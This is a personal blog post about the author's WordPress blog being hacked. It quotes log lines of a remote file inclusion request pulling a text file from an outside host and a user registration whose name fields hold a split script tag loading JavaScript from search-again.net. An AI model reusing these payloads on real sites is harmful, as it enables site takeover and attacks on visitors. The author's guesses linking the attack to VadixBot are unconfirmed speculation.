More VadixBot …or is it search-again.net?
It turns out that someone used some sort of an exploit to modify a few of my files and change my password. So I type this post as I sit here and wait for files to upload so I can upgrade my blog and Jaime’s blog.
I started doing some research on this. Here’s the log information for the IP that exploited my blog:
Host: 212.69.204.75
*
/2007/06/06/vadixbot-look-out/index.php?s=http://www.backbreakacres.com/22/test.txt??
Http Code: 404 Date: Apr 21 14:06:08 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)*
/index.php?s=http://www.backbreakacres.com/22/test.txt??
Http Code: 200 Date: Apr 21 14:06:11 Http Version: HTTP/1.1 Size in Bytes: 181
Referer: -
Agent: Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)
The first thing I noticed is that the entry point for the exploit was one of my two VadixBot posts. Hmm. Could this be someone associated with VadixBot trying to shut down my blog to prevent people from learning how VadixBot operates? I am the #1 and #2 results in Google for “VadixBot” and my posts are generally less-than-positive.
So I do some more digging, and find a post at a blog called Teh Spiffy Serena entitled VadixBot – Ban The Hell Out Of It. It’s worth reading if this is the sort of thing that interests you.
More digging, more possible connections. I notice there is a user registered on my blog with some suspicious details. Obviously, the user is trying to inject JavaScript into my site:
user_login: WordPress
user_firstname: <b id=”ux”><script language=”JavaScript”
user_lastname: src=”http://search-again.net/js/js.js”></script>
I assume their end goal is to somehow assemble the firstname and lastname fields on a page served by my blog, effectively executing JavaScript in the user’s browser.
Search-again.net looks like a pretty useless search engine. Their top 15 most recent searches, listed on their homepage, are things like:
- Buy Phentermine
- Order Viagra
- Tramadol Online
- Credit Report
- Acne
- Casino
- Stop Smoking
- Debt
- Basketball Bets
- Buy Adipex
- Weight Loss Pills
- Online Casinos
- Sports Book
- Buy Viagra
- Valium
Yeah right! As if anyone searches on those terms! I’m not a statistical analyst, but the chances that those terms would be searched all in a row like that are likely very slim.
Where’s this all going? I’m not sure. Is VadixBot and search-again.net associated? I’m not sure.
But, on the plus side, I’m running WordPress 2.5 now.

